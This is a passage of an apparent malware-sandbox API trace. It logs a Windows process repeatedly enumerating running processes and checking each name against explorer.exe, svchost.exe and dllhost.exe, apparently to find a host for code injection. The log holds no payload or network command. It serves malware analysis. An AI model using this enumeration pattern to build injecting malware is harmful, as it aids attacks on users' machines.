Wow64Process=0x2cf764) returned 1 [0252.288] CloseHandle (hObject=0xec) returned 1 [0252.288] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0252.288] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0252.288] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0252.288] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0252.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0252.288] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.288] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.288] CloseHandle (hObject=0xec) returned 1 [0252.288] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0252.288] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0252.288] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0252.288] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0252.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0252.289] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.289] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.289] CloseHandle (hObject=0xec) returned 1 [0252.289] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0252.289] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0252.289] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0252.289] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0252.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0252.290] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.290] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.290] CloseHandle (hObject=0xec) returned 1 [0252.290] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0252.290] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0252.290] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0252.290] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0252.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0252.290] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.290] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.290] CloseHandle (hObject=0xec) returned 1 [0252.290] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0252.290] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0252.290] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0252.290] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0252.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0252.291] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.291] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.291] CloseHandle (hObject=0xec) returned 1 [0252.291] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0252.291] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0252.291] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0252.291] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0252.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0252.292] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.292] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.292] CloseHandle (hObject=0xec) returned 1 [0252.292] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0252.292] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0252.292] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0252.292] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0252.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0252.292] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.292] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.292] CloseHandle (hObject=0xec) returned 1 [0252.292] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0252.292] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0252.292] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0252.292] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0252.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0252.293] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.293] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.293] CloseHandle (hObject=0xec) returned 1 [0252.293] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0252.293] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0252.293] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0252.293] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0252.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0252.294] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.294] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.294] CloseHandle (hObject=0xec) returned 1 [0252.294] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0252.294] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0252.294] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0252.294] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0252.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0252.294] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.294] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.294] CloseHandle (hObject=0xec) returned 1 [0252.294] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0252.294] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0252.295] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0252.295] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0252.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0252.295] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.295] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.295] CloseHandle (hObject=0xec) returned 1 [0252.295] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0252.295] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0252.295] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0252.295] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0252.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0252.296] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.296] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.296] CloseHandle (hObject=0xec) returned 1 [0252.296] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0252.296] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0252.296] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0252.296] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0252.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0252.296] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0252.297] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0252.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0252.297] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0252.298] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0252.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0252.298] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0252.299] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.299] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.299] CloseHandle (hObject=0xec) returned 1 [0252.299] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0252.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0252.299] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.299] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.300] CloseHandle (hObject=0xec) returned 1 [0252.300] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0252.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0252.300] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0252.301] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.301] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.301] CloseHandle (hObject=0xec) returned 1 [0252.301] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0252.301] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0252.301] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.301] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.301] CloseHandle (hObject=0xec) returned 1 [0252.301] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.302] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0252.302] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.302] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0252.302] CloseHandle (hObject=0xec) returned 1 [0252.302] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0252.303] CloseHandle (hObject=0xe8) returned 1 [0252.303] Sleep (dwMilliseconds=0x3e8) [0253.324] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0253.326] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0253.326] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0253.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0253.327] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0253.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0253.327] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0253.328] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0253.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0253.328] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0253.329] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0253.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0253.329] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0253.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0253.329] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0253.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0253.330] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0253.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0253.330] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0253.331] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0253.331] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0253.332] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0253.332] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0253.333] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0253.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0253.333] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0253.334] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0253.334] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0253.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0253.335] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.335] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.335] CloseHandle (hObject=0xec) returned 1 [0253.335] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, 